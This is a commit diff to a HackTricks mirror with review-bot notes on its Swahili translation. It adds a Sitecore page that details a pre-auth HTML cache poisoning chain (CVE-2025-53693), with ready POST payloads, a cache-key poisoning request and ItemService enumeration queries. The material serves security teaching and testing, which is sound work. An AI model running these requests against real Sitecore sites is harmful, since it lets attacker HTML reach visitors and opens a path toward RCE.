mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/pentesting-web/deserialization/basic-.net-deserializati
This commit is contained in:
parent
131e0a8eb0
commit
71125a141d
@ -447,6 +447,7 @@
- [NextJS](network-services-pentesting/pentesting-web/nextjs.md)
- [Nginx](network-services-pentesting/pentesting-web/nginx.md)
- [NodeJS Express](network-services-pentesting/pentesting-web/nodejs-express.md)
- [Sitecore](network-services-pentesting/pentesting-web/sitecore/README.md)
- [PHP Tricks](network-services-pentesting/pentesting-web/php-tricks-esp/README.md)
- [PHP - Useful Functions & disable_functions/open_basedir bypass](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md)
- [disable_functions bypass - php-fpm/FastCGI](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md)
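Review bot: the added `- [Sitecore](network-services-pentesting/pentesting-web/sitecore/README.md)` entry sits between NodeJS Express and PHP Tricks, breaking the alphabetical order the neighbouring entries keep (NextJS, Nginx, NodeJS Express, PHP Tricks, ...); move it down to the S entries so the summary stays sorted.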
@ -929,4 +930,3 @@
- [Post Exploitation](todo/post-exploitation.md)
- [Investment Terms](todo/investment-terms.md)
- [Cookies Policy](todo/cookies-policy.md)

@ -1,12 +1,12 @@
# 80,443 - Pentesting Web Methodology
# 80,443 - Pentesting Wavuti Mbinu

{{#include ../../banners/hacktricks-training.md}}

## Taarifa Msingi
## Taarifa za Msingi

Huduma ya web ni huduma ya **kawaida zaidi na yenye upana mkubwa**, na kuna aina nyingi tofauti za **vulnerabilities**.
Huduma ya wavuti ndiyo **huduma inayotokea zaidi na yenye upeo mpana**, na kuna **aina nyingi tofauti za udhaifu**.

**Port ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
PORT STATE SERVICE
80/tcp open http
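Review bot: the retranslated title `# 80,443 - Pentesting Wavuti Mbinu` keeps English word order, which is ungrammatical in Swahili (the head noun comes first); `# 80,443 - Mbinu za Pentesting ya Wavuti` reads naturally, or keep the original English page title as the replaced line did.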
@ -24,38 +24,38 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
web-api-pentesting.md
{{#endref}}

## Muhtasari wa Methodolojia
## Muhtasari wa Mbinu

> Katika methodolojia hii tutadhani kuwa utashambulia domain (au subdomain) na hiyo pekee. Kwa hivyo, unapaswa kutumia methodolojia hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambuliwa ndani ya wigo.
> Katika mbinu hii tutachukulia kwamba unalenga domain (au subdomain) na tu hiyo. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambulika ndani ya upeo.

- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani mzima ikiwa unaweza kutambua teknolojia hiyo.
- [ ] Je, kuna **udhaifu unaojulikana** katika toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **mbinu muhimu** za kupata taarifa zaidi?
- [ ] Je, kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Haujui kama zitatoka na kitu au kupata taarifa ya kuvutia.
- [ ] Anza na **ukaguzi wa awali**: **robots**, **sitemap**, **404 error** na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote, folda na **parameta zinazotumika.** Pia, angalia **uvumbuzi maalum**.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambulika wakati wa brute-forcing au spidering, inapaswa kuspider._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta **faili** na **saraka** mpya.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambuliwa wakati wa brute-forcing au spidering, inapaswa kufanywa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona ikiwa unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongeza viambatisho vya backup vinavyojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta parameta zilizofichwa**.
- [ ] Mara unapokuwa umewataja yote **endpoints** zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **tricks** za kuzingatia wakati wa mtihani ukifanikiwa kutambua tech.
- [ ] Kuna **udhaifu unaojulikana** wa toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Endesha **general purposes scanners**. Huwezi kujua kama zitapata kitu au zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (if **HTTPS**).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** yote yanayowezekana ya **faili, folda** na **parameters being used.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa spidered._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta faili na directories mpya.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongezea extensions za backup zinazojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta vigezo vilivyo fiche**.
- [ ] Mara tu umeshapata na **tambulisha** yote yanayowezekana **endpoints** zinazopokea **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii](../../pentesting-web/web-vulnerabilities-methodology.md)

## Server Version (Je lina udhaifu?)
## Toleo la Server (Vulnerable?)

### Tambua

Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la server linaloendesha.\
Vichwa vya **HTTP** na **cookies** za majibu vinaweza kuwa vya msaada mkubwa kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb), [**webtech**](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com) zinaweza kuwa za msaada:
**HTTP headers** na **cookies** za response zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** zinazotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia inaweza kuwa muhimu zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
Tafuta **kwa** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
Tafuta [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)

### **Angalia kama kuna WAF**

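Review bot: this retranslation reintroduces untranslated English fragments into the checklist that the replaced lines had in Swahili: `well known tech`, `general purposes scanners`, `initial checks`, `parameters being used`, `special findings`, and the heading `## Toleo la Server (Vulnerable?)` versus the earlier `(Je lina udhaifu?)`. Keep the Swahili wording from the replaced lines (`ukaguzi wa awali`, `uvumbuzi maalum`, `Je, lina udhaifu?`) so the list is not mixed-language; the `**Port**` to `**Bandari**` change and `Tafuta **kwa**` to `Tafuta` are fine.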
@ -63,9 +63,9 @@ Tafuta **kwa** [**vulnerabilities of the web application** **version**](../../ge
- [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
- [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)

### Mbinu za teknolojia za Web
### Mbinu za teknolojia za wavuti

Baadhi ya **mbinu** za **kutafuta udhaifu** katika **teknolojia** mbalimbali zinazotumika:
Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tofauti zinazotumika:

- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
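Review bot: `Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu ...` swaps the Swahili `kutafuta udhaifu` of the replaced line for an English phrase; keep `**kutafuta udhaifu**` and only carry over the wording change (`teknolojia maarufu tofauti`).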
@ -100,28 +100,29 @@ Baadhi ya **mbinu** za **kutafuta udhaifu** katika **teknolojia** mbalimbali zin
- [**Werkzeug**](werkzeug.md)
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
- [**Sitecore**](sitecore/index.html)

_Tafadhali zingatia kwamba **domeni ile ile** inaweza kutumia **teknolojia tofauti** katika **bandari**, **folda** na **subdomains** tofauti._\
Ikiwa programu ya wavuti inatumia **tech/platform** yoyote iliyotajwa hapo juu au **nyingine yoyote**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
_Zingatia kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._\
Ikiwa web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).

### Ukaguzi wa Source Code
### Mapitio ya Source Code

Ikiwa **source code** ya programu inapatikana kwenye **github**, mbali na kufanya mwenyewe **White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** kwa ajili ya sasa ya **Black-Box testing**:
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na kufanya kwa **your own a White box test** ya application kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** ya sasa:

- Je, kuna faili ya **Change-log or Readme or Version** au kitu chochote chenye **version info accessible** kupitia wavuti?
- Je, vipi na wapi zinahifadhiwa **credentials**? Je, kuna faili (inayopatikana?) yenye **credentials** (majina ya watumiaji au passwords)?
- Je, passwords ziko kwa **plain text**, **encrypted**, au ni algorithm gani ya **hashing** inayotumika?
- Je, inatumia **master key** yoyote kwa **encrypting** kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza kufikia faili zozote kati ya hizi kwa **exploiting** udhaifu wowote?
- Je, kuna taarifa za kuvutia kwenye **github** (issues zilizotatuliwa na zisizotatuliwa)? Au katika **commit history** (labda password ilizingirwa ndani ya commit ya zamani)?
- Je, **credentials** zimehifadhiwa vipi na wapi? Je, kuna (inayoweza kupatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko katika **plain text**, **encrypted** au ni algorithimu gani ya **hashing algorithm** inatumiwa?
- Je, inatumia **master key** yoyote kwa ku-encrypt kitu? Ni **algorithm** gani inatumiwa?
- Je, unaweza **access any of these files** ukitumia udhaifu fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (pengine kuna **password introduced inside an old commit**)?

{{#ref}}
code-review-tools.md
{{#endref}}

### Automatic scanners
### Skana za kiotomatiki

#### General purpose automatic scanners
#### Skana za kiotomatiki za matumizi ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
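Review bot: the new code-review paragraph `... mbali na kufanya kwa **your own a White box test** ya application kuna **some information** ambazo zinaweza kuwa **useful** ...` is half English and grammatically broken (the bold English fragments are not Swahili phrases); the replaced line `mbali na kufanya mwenyewe **White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** ...` was clearer and should be kept. The same applies to the bullets `Je, unaweza **access any of these files** ...` and `Je, kuna **interesting information in the github** ...`, whose replaced versions were fully Swahili. The translated scanner headings `### Skana za kiotomatiki` and `#### Skana za kiotomatiki za matumizi ya jumla` are a good fix.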
@ -133,14 +134,14 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### Vichunguzi vya CMS
#### Skana za CMS

Ikiwa CMS inatumiwa usisahau **kukimbiza skana**, huenda ikapatikana kitu cha kuvutia:
Ikiwa CMS inatumiwa, usisahau **kufanya skana** — pengine unaweza kupata kitu cha kuvutia:

[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **au** [**(M)oodle**](moodle.md)\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **or** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
```bash
cmsmap [-f W] -F -d <URL>
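Review bot: in the `**CMSMap**` line the only change is the Swahili `**au**` becoming the English `**or**`, a regression for a translation; keep `**au**`. The heading change `#### Vichunguzi vya CMS` to `#### Skana za CMS` is consistent with the scanner headings above and is fine.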
@ -148,45 +149,45 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Kwa wakati huu unapaswa tayari kuwa na baadhi ya habari kuhusu web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati, umeweza hata kugundua CMS na kuendesha scanner.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za Web server zinazotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu kadhaa za kuzingatia wakati wa mtihani. Ikiwa una bahati uliweza hata kupata CMS na kuendesha scanner.

## Ugunduzi wa Web Application Hatua kwa Hatua
## Step-by-step Web Application Discovery

> Tangu hapa tutaanza kuingiliana na web application.
> Kutoka hapa tutaanza kuingiliana na web application.

### Ukaguzi wa awali
### Initial checks

**Kurasa za default zenye taarifa za kuvutia:**
**Default pages with interesting info:**

- /robots.txt
- /sitemap.xml
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni (comments) kwenye kurasa kuu na za sekondari.
- Angalia pia maoni kwenye kurasa kuu na kurasa za pili.

**Kusababisha makosa**
**Forcing errors**

Web servers zinaweza **kutenda kwa njia isiyotab predictable** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **tadhaa** au **kufichua taarifa nyeti**.
Web servers zinaweza **kutenda kwa njia isiyotarajiwa** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **udhaifu** au kusababisha **kufichua taarifa nyeti**.

- Fikia **kurasa za uongo** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[\["** katika **cookie values** na **parameter** values ili kuunda makosa
- Tengeneza kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **HTTP Verbs** tofauti kama PATCH, DEBUG au zenye makosa kama FAKE
- Fikia kurasa za **fake** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[["** katika **cookie values** na **parameter** values ili kusababisha makosa
- Zalisha kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **different HTTP Verbs** kama PATCH, DEBUG au mbaya kama FAKE

#### **Angalia kama unaweza kupakia files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**

Kama utagundua kuwa **WebDav** iko **imewezeshwa** lakini huna ruhusa za kutosha za **kupakia files** kwenye folder la root jaribu:
Ikiwa utagundua kwamba **WebDav** imewezeshwa lakini huna ruhusa za kutosha za **uploading files** kwenye root folder jaribu:

- **Brute Force** credentials
- **Upload files** kupitia WebDav kwenye **sehemu zilizobaki** za **found folders** ndani ya ukurasa wa wavuti. Huenda una ruhusa za kupakia files katika folda nyingine.
- **Upload files** via WebDav kwenye **rest** ya **found folders** ndani ya web page. Huenda ukaweza kuwa na ruhusa za kupakia files katika folda nyingine.

### **SSL/TLS vulnerabilites**

- Ikiwa application **hainatii matumizi ya HTTPS** katika sehemu yoyote, basi iko **hatarini kwa MitM**
- Ikiwa application inatuma data nyeti (passwords) kutumia HTTP. Hii ni hatari kubwa.
- Ikiwa application **isn't forcing the user of HTTPS** sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa application inatumia **HTTP** kutuma data nyeti (passwords). Hii ni vulnerability kubwa.

Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kukagua **vulnerabilities** (Katika programu za Bug Bounty labda aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) kwa kukagua tena vulnerabilities:
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika Bug Bounty programs pengine aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) ili kukagua tena vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
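Review bot: four section titles that were already in Swahili are replaced by English ones (`## Step-by-step Web Application Discovery`, `### Initial checks`, `**Default pages with interesting info:**`, `**Forcing errors**`); keep the earlier `## Ugunduzi wa Web Application Hatua kwa Hatua`, `### Ukaguzi wa awali`, `**Kurasa za default zenye taarifa za kuvutia:**` and `**Kusababisha makosa**`, and likewise the Swahili `**hainatii matumizi ya HTTPS**` rather than `**isn't forcing the user of HTTPS**`. The correction of `isiyotab predictable` / `tadhaa` to `isiyotarajiwa` / `udhaifu` is right. The unchanged context heading `### **SSL/TLS vulnerabilites**` still carries the typo `vulnerabilites` and could be fixed in the same pass.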
@ -202,13 +203,13 @@ Information about SSL/TLS vulnerabilities:

### Spidering

Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
Launch some kind of **spider** inside the web. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwenye application inayotestwa. Kwa hivyo, web crawling na vyanzo vya nje zinapaswa kutumika kupata njia halali nyingi iwezekanavyo.

- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. Unaweza kutoa tu faili yenye hosts na faili yenye paths na meg itachukua kila path kwa kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
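Review bot: the `gospider` entry silently drops `AlienVault.com` from its list of external sources while nothing else on the line changes; unless the tool really removed that source, restore it. The Spidering paragraph and the `meg` entry are only half translated (`Launch some kind of **spider** inside the web.` and `This tool isn't a spider but it can be useful.` remain English before Swahili continuations), so either finish the sentence or leave the whole line untranslated. The unchanged `hakrawler` line has pre-existing typos (`HML spider`, `LinkFider`) worth fixing while here.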
@ -267,12 +268,12 @@ Tools:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_

_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
_Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Force._

### What to check on each file found

- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
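Review bot: `_Tafuta kwamba kila wakati directory mpya inapogunduliwa ..._` renders "Note that" as `Tafuta` (search for); the same sentence earlier in this file uses `_Kumbuka kwamba ..._`, which is the correct verb, so use it here too. The `**File Backups**` bullet translates only its last sentence (`Unaweza pia kutumia tool ... **or** ...`), leaving the rest English and the connector `**or**` untranslated; either translate the whole bullet or leave it as it was.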
@ -299,7 +300,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- **TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.

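Review bot: the TrainFuck bullet loses its opening bracket (`- **TrainFuck**](https://github.com/taco-c/trainfuck)**:**` instead of `- [**TrainFuck**](...)**:**`), so the markdown link no longer renders and a stray `](` is shown; restore the `[`. The unchanged context line `**monitor the files were forms were detected** ... the apearance f a new form` has pre-existing typos (`where forms were`, `appearance of`) that could be fixed in the same pass.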
@ -0,0 +1,194 @@
# Sitecore Experience Platform (XP) – Pre‑auth HTML Cache Poisoning to Post‑auth RCE

{{#include ../../../banners/hacktricks-training.md}}

Ukurasa huu unatoa muhtasari wa mnyororo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 unaotoka kutoka kwenye pre‑auth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, kufikia RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa matoleo/vitengo vya Sitecore vinavyofanana na zinatoa primitives za kujaribu, kugundua, na kuimarisha.

- Bidhaa iliyoathiriwa iliyojaribiwa: Sitecore XP 10.4.1 rev. 011628
- Imerekebishwa katika: KB1003667, KB1003734 (Juni/Julai 2025)

Angalia pia:

{{#ref}}
../../../pentesting-web/cache-deception/README.md
{{#endref}}

{{#ref}}
../../../pentesting-web/deserialization/README.md
{{#endref}}

## Pre‑auth primitive: XAML Ajax reflection → HtmlCache write

Entrypoint is the pre‑auth XAML handler registered in web.config:
```xml
<add verb="*" path="sitecore_xaml.ashx" type="Sitecore.Web.UI.XamlSharp.Xaml.XamlPageHandlerFactory, Sitecore.Kernel" name="Sitecore.XamlPageRequestHandler" />
```
Inapatikana kupitia:
```
GET /-/xaml/Sitecore.Shell.Xaml.WebControl
```
Mti wa controls unajumuisha AjaxScriptManager ambayo, kwenye maombi ya matukio, husoma maeneo yaliyodhibitiwa na mshambuliaji na kwa kutumia reflection huitekeleza methods kwenye controls zilizolengwa:
```csharp
// AjaxScriptManager.OnPreRender
string clientId = page.Request.Form["__SOURCE"]; // target control
string text = page.Request.Form["__PARAMETERS"]; // Method("arg1", "arg2")
...
Dispatch(clientId, text);

// eventually → DispatchMethod(control, parameters)
MethodInfo m = ReflectionUtil.GetMethodFiltered<ProcessorMethodAttribute>(this, e.Method, e.Parameters, true);
if (m != null) m.Invoke(this, e.Parameters);

// Alternate branch for XML-based controls
if (control is XmlControl && AjaxScriptManager.DispatchXmlControl(control, args)) {...}
```
Uchunguzi muhimu: ukurasa la XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl inatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitisha ReflectionUtil.Filter allow‑list (Sitecore.*), likifungua methods kwenye Sitecore WebControl.

Magic method for poisoning:
```csharp
// Sitecore.Web.UI.WebControl
protected virtual void AddToCache(string cacheKey, string html) {
HtmlCache c = CacheManager.GetHtmlCache(Sitecore.Context.Site);
if (c != null) c.SetHtml(cacheKey, html, this._cacheTimeout);
}
```
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita Sitecore.Web.UI.WebControl methods kwa jina, tunapata pre‑auth arbitrary HtmlCache write primitive.

### Ombi la PoC (CVE-2025-53693)
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl HTTP/2
Host: target
Content-Type: application/x-www-form-urlencoded

__PARAMETERS=AddToCache("wat","<html><body>pwn</body></html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Vidokezo:
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwa kuwa hutokana na XAML isiyobadilika).
- __PARAMETERS muundo ni Method("arg1","arg2").

## Nini cha poison: Ujenzi wa Cache key

Ujenzi wa kawaida wa HtmlCache key unaotumiwa na Sitecore controls:
```csharp
public virtual string GetCacheKey(){
SiteContext site = Sitecore.Context.Site;
if (this.Cacheable && (site == null || site.CacheHtml) && !this.SkipCaching()){
string key = this.CachingID.Length > 0 ? this.CachingID : this.CacheKey;
if (key.Length > 0){
string k = key + "_#lang:" + Language.Current.Name.ToUpperInvariant();
if (this.VaryByData) k += ResolveDataKeyPart();
if (this.VaryByDevice) k += "_#dev:" + Sitecore.Context.GetDeviceName();
if (this.VaryByLogin) k += "_#login:" + Sitecore.Context.IsLoggedIn;
if (this.VaryByUser) k += "_#user:" + Sitecore.Context.GetUserName();
if (this.VaryByParm) k += "_#parm:" + this.Parameters;
if (this.VaryByQueryString && site?.Request != null)
k += "_#qs:" + MainUtil.ConvertToString(site.Request.QueryString, "=", "&");
if (this.ClearOnIndexUpdate) k += "_#index";
return k;
}
}
return string.Empty;
}
```
Mfano wa targeted poisoning kwa sublayout inayojulikana:
```
__PARAMETERS=AddToCache("/layouts/Sample+Sublayout.ascx_%23lang:EN_%23login:False_%23qs:_%23index","<html>…attacker HTML…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
## Kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache na vipimo vya “vary by”

Ikiwa ItemService imefunuliwa (kibaya) kwa watu wasiojulikana, unaweza kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache ili kupata funguo sahihi.

Jaribio la haraka:
```
GET /sitecore/api/ssc/item
// 404 Sitecore error body → exposed (anonymous)
// 403 → blocked/auth required
```
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na bendera:
```
GET /sitecore/api/ssc/item/search?term=layouts&fields=&page=0&pagesize=100
```
Angalia sehemu kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
```
GET /sitecore/api/ssc/item/search?term=_templatename:Device&fields=ItemName&page=0&pagesize=100
```
### Side‑channel enumeration chini ya vitambulisho vilivyo na vikwazo (CVE-2025-53694)

